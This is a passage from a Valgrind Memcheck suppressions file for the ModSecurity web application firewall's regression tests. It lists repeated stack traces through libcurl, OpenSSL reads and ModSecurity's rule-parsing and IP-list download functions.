fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:assign fun:_M_set_length fun:_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_appendEPKcm fun:append fun:_ZN11modsecurity5Utils11HttpsClient11handle_implEPcmm obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove fun:copy fun:_ZNSt15basic_streambufIcSt11char_traitsIcEE6xsputnEPKcl fun:sputn fun:__ostream_write > fun:_ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_l fun:operator<< , std::allocator > fun:_ZN11modsecurity5Utils6IpTree13addFromBufferERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove fun:copy fun:_ZNSt15basic_streambufIcSt11char_traitsIcEE6xsputnEPKcl fun:sputn fun:__ostream_write > fun:_ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_l fun:operator<< , std::allocator > fun:_ZN11modsecurity5Utils6IpTree13addFromBufferERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:strtok_r fun:add_ip_from_param fun:_ZN11modsecurity5Utils6IpTree13addFromBufferEPSiPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree13addFromBufferERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:strtok_r fun:add_ip_from_param fun:_ZN11modsecurity5Utils6IpTree13addFromBufferEPSiPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree13addFromBufferERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:strtok_r fun:add_ip_from_param fun:_ZN11modsecurity5Utils6IpTree13addFromBufferEPSiPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree13addFromBufferERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:strtok_r fun:add_ip_from_param fun:_ZN11modsecurity5Utils6IpTree13addFromBufferEPSiPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree13addFromBufferERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:strtok_r fun:add_ip_from_param fun:_ZN11modsecurity5Utils6IpTree13addFromBufferEPSiPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree13addFromBufferERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove fun:ssl3_read_bytes fun:ssl3_read obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove fun:ssl3_read_bytes fun:ssl3_read obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove fun:ssl3_read_bytes fun:ssl3_read obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove fun:ssl3_read_bytes fun:ssl3_read obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__GI_strchr obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__GI_strchr obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:____strtol_l_internal obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:____strtol_l_internal obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:____strtol_l_internal obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:____strtol_l_internal obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:____strtol_l_internal obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ 